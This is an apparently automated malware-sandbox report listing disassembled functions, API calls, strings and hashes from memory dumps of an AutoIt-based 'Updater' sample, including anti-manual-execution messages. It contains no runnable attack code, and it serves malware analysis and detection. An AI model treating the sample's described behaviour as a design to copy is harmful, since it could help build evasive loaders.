Instruction ID: 5812b6b692c47fe7b9b159045a98d08055e54c0c1f766678d7a9a0d2d4ea91aa
Opcode Fuzzy Hash: 410f27f7e20b1f2a5ce36bec7d5ab985a65c07de0cce0e0a68e321972adaba67
Instruction Fuzzy Hash: 1FA11532A241449FDF19EF68D891BAE7BE0EB06321F1401D9F811AB3D2DB799C16CB51

Function 00B30E5B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B21155: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF), ref: 00B21173

Part of subcall function 00B3FD48: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B30F35), ref: 00B3FD6A

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B30F78
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B76FEF
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B77030
RegCloseKey.ADVAPI32(?), ref: 00B77072
_wcslen.LIBCMT ref: 00B770D9
_wcslen.LIBCMT ref: 00B770E8

Strings

\, xrefs: 00B770EE
Include, xrefs: 00B76FE6, 00B77027
\Include\, xrefs: 00B30F35
Software\AutoIt v3\AutoIt, xrefs: 00B30F6E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 105f1bdaaa786014d734a870c2881b2f35af67367ffdd1126fcf940aa564c72f
Instruction ID: 92704e63f513c8e95c1ce0af99f6cc80518a47789e9670eed06cbce03d833500
Opcode Fuzzy Hash: 105f1bdaaa786014d734a870c2881b2f35af67367ffdd1126fcf940aa564c72f
Instruction Fuzzy Hash: EB715A715083019EC704EF65E8819BABBF8FF98B40F4048AEF549C71A0EF709A48CB56

Function 00B32C51 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 64
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B32C5C
LoadCursorW.USER32(00000000,00007F00), ref: 00B32C6B
LoadIconW.USER32(00000063), ref: 00B32C81
LoadIconW.USER32(000000A4), ref: 00B32C93
LoadIconW.USER32(000000A2), ref: 00B32CA5
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B32CBD
RegisterClassExW.USER32(?), ref: 00B32D0E

Part of subcall function 00B3507A: GetSysColorBrush.USER32(0000000F), ref: 00B350AD
Part of subcall function 00B3507A: RegisterClassExW.USER32(00000030), ref: 00B350D7
Part of subcall function 00B3507A: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B350E8
Part of subcall function 00B3507A: InitCommonControlsEx.COMCTL32(?), ref: 00B35105
Part of subcall function 00B3507A: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B35115
Part of subcall function 00B3507A: LoadIconW.USER32(000000A9), ref: 00B3512B
Part of subcall function 00B3507A: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B3513A

Strings

AutoIt v3, xrefs: 00B32CFD
0, xrefs: 00B32CDD
#, xrefs: 00B32CE4

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 7add84611062dd9ad367f4ecc1efe08cc9e7787ac0177f9d5cf75955f4038b65
Instruction ID: 870ecafd26a1f5c3cfa3195f45c1ea904c1d29b27fb96c277fd5e0ab52b1ae40
Opcode Fuzzy Hash: 7add84611062dd9ad367f4ecc1efe08cc9e7787ac0177f9d5cf75955f4038b65
Instruction Fuzzy Hash: C52103B5D01318AFEB109FA5EC45BAABFF4FB48710F10412AF504A72A0DBB94950CF98

Function 00B33998 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00B33992,?,?), ref: 00B33A00
KillTimer.USER32(?,00000001,?,?,?,?,?,00B33992,?,?), ref: 00B33A2C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B33A4F
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00B33992,?,?), ref: 00B33A5A
CreatePopupMenu.USER32 ref: 00B33A6E
PostQuitMessage.USER32(00000000), ref: 00B33A8F

Strings

TaskbarCreated, xrefs: 00B33A55

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 280abe6649e9f9e0bfe1de28971ac7e60159f7ba6f44f5c26d0b226779ce37b5
Instruction ID: f8a720534683c68518e3aa3628f1ba11e9d7ebf632c3fd2def01ae2fae9b0397
Opcode Fuzzy Hash: 280abe6649e9f9e0bfe1de28971ac7e60159f7ba6f44f5c26d0b226779ce37b5
Instruction Fuzzy Hash: DD410171284104ABDB145B789C8EBBE3AD5EB04B01F2083E5F646D72A1DEB99E048765

Function 00B58B75 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de16bdbac08449613dbbf31b076a07d75d59f0c4f04dd6d5d09736392dcc116
Instruction ID: ed723a3b3d92747e97794b31885463e6b310c7300ec343b5093fb22f24d0741b
Opcode Fuzzy Hash: 5de16bdbac08449613dbbf31b076a07d75d59f0c4f04dd6d5d09736392dcc116
Instruction Fuzzy Hash: 7BC1C170A05249AFDB11DFA8C881BADBBF1EF1A312F1405D8ED14B7392CB749949CB60

Function 0140ADC1 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 161
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,Executing manually will not work,0140B061,00000000), ref: 0140AE22
MessageBoxA.USER32(00000000,no data,0140B061,00000000), ref: 0140AE9A
GetTickCount.KERNEL32 ref: 0140AF32

Strings

oYvuAoJf, xrefs: 0140ADF2
no data, xrefs: 0140AE93
Executing manually will not work, xrefs: 0140AE1B

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: Message$CountTick
String ID: Executing manually will not work$no data$oYvuAoJf
API String ID: 1431039135-1909694823
Opcode ID: 7a7e6264a80d44c768987b5b3ad90fca6b3c3bbcbfd9e5bb4529ba86cb8f67df
Instruction ID: a46cea9a6b18df3ff07c8f054a3365b171662544cdb55793f21fcf95c100398e
Opcode Fuzzy Hash: 7a7e6264a80d44c768987b5b3ad90fca6b3c3bbcbfd9e5bb4529ba86cb8f67df
Instruction Fuzzy Hash: BF610E78A00206CFC722EBEBD590A5DB3B1EB68344F10417AE954677B8CB74AC46CB51

Function 00B3FBB7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B3FBE5
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B3FC06
ShowWindow.USER32(00000000), ref: 00B3FC1A
ShowWindow.USER32(00000000), ref: 00B3FC23

Strings

AutoIt v3, xrefs: 00B3FBDD, 00B3FBE2, 00B3FBE3
edit, xrefs: 00B3FC00

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: a62221ead202b53c872960ce8bb2c2d1ac325063d1b4fc66fd7ea8cce7e03da9
Instruction ID: 86d4e338bd77042188547af254dbe5d55e5a3e81e8f6efda63b19b5f9a63f8cd
Opcode Fuzzy Hash: a62221ead202b53c872960ce8bb2c2d1ac325063d1b4fc66fd7ea8cce7e03da9
Instruction Fuzzy Hash: D7F0FEB19412947FEA311B176C4CE773EBDD7CBF50F10006EB900A31B0D9A90851DAB8

Function 01403B65 Relevance: 9.1, APIs: 6, Instructions: 106filewindowCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,01407FB5,00000001,00000000,00000000,00000000), ref: 01403B81
MessageBoxA.USER32(00000000,01403C9D,01403C99,00000000), ref: 01403B9B
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,01407FB5,00000001,00000000), ref: 01403BA3
ReadFile.KERNEL32(00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01403BC5
MessageBoxA.USER32(00000000,01403CA1,01403C99,00000000), ref: 01403BDC
CloseHandle.KERNEL32(00000000,00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01403C86

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: File$Message$CloseCreateHandleReadSize
String ID:
API String ID: 2324011479-0
Opcode ID: d809dae25947b1c06b9decda4c16c3937252237a62d7ab3209bd963f12a55c11
Instruction ID: e4ea3d8cd1a2d85f0aff2c3fcc623fae20dc63f2d0fdcd341e3d7c6cd4a48f5d
Opcode Fuzzy Hash: d809dae25947b1c06b9decda4c16c3937252237a62d7ab3209bd963f12a55c11
Instruction Fuzzy Hash: 16312875648301AFD304EF1ECC85F1AB7E5FF84A14F10882DBA98DB392C674E8058A61

Function 00B40A12 Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

___scrt_release_startup_lock.LIBCMT ref: 00B40AA4
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00B40AB8
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00B40ADD
___scrt_get_show_window_mode.LIBCMT ref: 00B40AEF
___scrt_uninitialize_crt.LIBCMT ref: 00B40B20
___scrt_fastfail.LIBCMT ref: 00B40B6F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ___scrt_is_nonwritable_in_current_image$___scrt_fastfail___scrt_get_show_window_mode___scrt_release_startup_lock___scrt_uninitialize_crt
String ID:
API String ID: 4079798206-0
Opcode ID: 0e070428001a945bda99c9ebb6ed0779f5086f1240bdd95704018287b286ec87
Instruction ID: 59cc8db37057908b7dc7bccfbc635821ee555b6f651bc81ab770cf93d5fcbc78
Opcode Fuzzy Hash: 0e070428001a945bda99c9ebb6ed0779f5086f1240bdd95704018287b286ec87
Instruction Fuzzy Hash: CF213521A91301AADB2077789C02BBD33E1CF52326F2408E9F680672D3CEB54F40B665

Function 00B35C80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B35C71,SwapMouseButtons,00000004,?), ref: 00B35CA4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B35C71,SwapMouseButtons,00000004,?,?,?,?,00B34F9C), ref: 00B35CC5
RegCloseKey.KERNELBASE(00000000,?,?,00B35C71,SwapMouseButtons,00000004,?,?,?,?,00B34F9C), ref: 00B35CE7

Strings

Control Panel\Mouse, xrefs: 00B35CA2

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: bd6b2f70a1c2ded85fd0ed2718ee627f459d332c12ba8667f88b42602bc7586e
Instruction ID: 3a15b0c17d3f142ec3a7d0c34d9b5fd26f593d080d9a9fa9ebdd2d4ef42f57bc
Opcode Fuzzy Hash: bd6b2f70a1c2ded85fd0ed2718ee627f459d332c12ba8667f88b42602bc7586e
Instruction Fuzzy Hash: 7B115775611608BFDB20DF68DC80EAFBBF8EF04704FA055A9B805D7210E6319E40ABA0

Function 00B27FF0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00B67FA3

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: f7a5fcc1c1c267fff5c39f7b4f81d7feb772d46a1d13e011e218b2564e686dc7
Instruction ID: a2dbb56025846a4831d97d56ae0dcdf4218ddc1aaa09c9abd9f1cc0615e99a50
Opcode Fuzzy Hash: f7a5fcc1c1c267fff5c39f7b4f81d7feb772d46a1d13e011e218b2564e686dc7
Instruction Fuzzy Hash: C8C2AF71E01225CFCB24DF58E880AADB7F1FF18700F2481A9E919AB351DB75AD42CB91

Function 0140780D Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0140789C), ref: 0140784D
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0140789C), ref: 0140785C
ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0140789C), ref: 0140787B
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 01407881

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 57911425b7c7910d36443171246d6032c1acfec1cb0ccf03b88ce738b6a3ca5d
Instruction ID: 5fedfae7f2a63b396c892d69af003a2e8309c69fc63c7428a88cea856999afa8
Opcode Fuzzy Hash: 57911425b7c7910d36443171246d6032c1acfec1cb0ccf03b88ce738b6a3ca5d
Instruction Fuzzy Hash: 5B111B71A44309BEE751EBBCCC82F5AB6ECEB08714F200579B654E62D1E6756E00CA20

Function 0140AC41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 227windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Executing manually will not work,0140B061,00000000), ref: 0140AE22

Strings

oYvuAoJf, xrefs: 0140ADF2
Executing manually will not work, xrefs: 0140AE1B

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: Message
String ID: Executing manually will not work$oYvuAoJf
API String ID: 2030045667-97121892
Opcode ID: f0af58460b35a292bf4b1605e1d1ef144ac978ac0bd159008b19e349faac500b
Instruction ID: cf7bba27408e0eeabd4f204674ce5fe9826718296fd31b211c5ed8f1c120f33e
Opcode Fuzzy Hash: f0af58460b35a292bf4b1605e1d1ef144ac978ac0bd159008b19e349faac500b
Instruction Fuzzy Hash: 8471C0B0988346CFD796DEA2D8426E877F0FB01339F24417FD56286162D6BD88838E41

Function 00B4042B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00B40C74

Part of subcall function 00B4440C: RaiseException.KERNEL32(?,?,?,00B40C96,?,00000001,?,?,?,?,?,?,00B40C96,?,00BE94C0), ref: 00B4446B

__CxxThrowException@8.LIBVCRUNTIME ref: 00B40C91

Strings

Unknown exception, xrefs: 00B40C9E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 989b943aa4d7767be74cfcc551874c69c26fcafc052853f261f65686464a7438
Instruction ID: ec9e50287d07e90acf0a3aa8e4ebf9d9db6dab69ae509c7b89b0cdbe220aacba
Opcode Fuzzy Hash: 989b943aa4d7767be74cfcc551874c69c26fcafc052853f261f65686464a7438
Instruction Fuzzy Hash: 9EF0C26492020DFB8F14BAA4E896F5D77FCDE00314B9082F0BB24965D2EB70DB26E5D0

Function 00BA8974 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00BA8D10
TerminateProcess.KERNEL32(00000000), ref: 00BA8D17
FreeLibrary.KERNEL32(?,?,?,?), ref: 00BA8EF8

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: aed55d89af2d5be0533cfdea94bd0c93f49329b54017b855e1843c64fd40066d
Instruction ID: 59b4a2036df329afa7e3473c27a761eaa09331158cfebdc1cbea1f4936236371
Opcode Fuzzy Hash: aed55d89af2d5be0533cfdea94bd0c93f49329b54017b855e1843c64fd40066d
Instruction Fuzzy Hash: EB125C71A08341DFC714DF28C484B6ABBE5FF89314F1489ADE8898B252DB35E945CF92

Function 00B2921A Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B3FA2C
Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B3FA34
Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B3FA3F
Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B3FA4A
Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B3FA52
Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FA5A

Part of subcall function 00B3F508: RegisterWindowMessageW.USER32(00000004,?,00B293EB), ref: 00B3F560

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B29488
OleInitialize.OLE32 ref: 00B294A6
CloseHandle.KERNEL32(00000000,00000000), ref: 00B68D75

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 448b719e703a9a31462c429d6dda2cc5fc14f445fe15b2e961b8384ab7cbd02c
Instruction ID: 8e3cff9b37550ec2f9ca815b8bdbf911fc47a6fd2bcd57fde7a46d432993e9d2
Opcode Fuzzy Hash: 448b719e703a9a31462c429d6dda2cc5fc14f445fe15b2e961b8384ab7cbd02c
Instruction Fuzzy Hash: 4B719AB19122058FD388EF79BD6A6753BE1FB6834071086BAE508C7361EF744949CF54

Function 00B31CF6 Relevance: 4.6, APIs: 3, Instructions: 104COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 00B31D9F
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001), ref: 00B31DAF

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 152b8adbe05012fafcbb0bf26109582710007d3a9b82f2bde3cc9cef2aeb271c
Instruction ID: 6d9290b01ef03d7fdd94392664712c45a14b1b0009c246d9bfa8c4a67d0633d2
Opcode Fuzzy Hash: 152b8adbe05012fafcbb0bf26109582710007d3a9b82f2bde3cc9cef2aeb271c
Instruction Fuzzy Hash: 56313C31A00609FFDB14CF6CC880B99B7F9FB04714F248A6AE91897284C771BDA4DB90

Function 00B33619 Relevance: 4.6, APIs: 3, Instructions: 76timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B337B5: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B338A8

KillTimer.USER32(?,00000001), ref: 00B336A2
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B336B1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B77D4E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
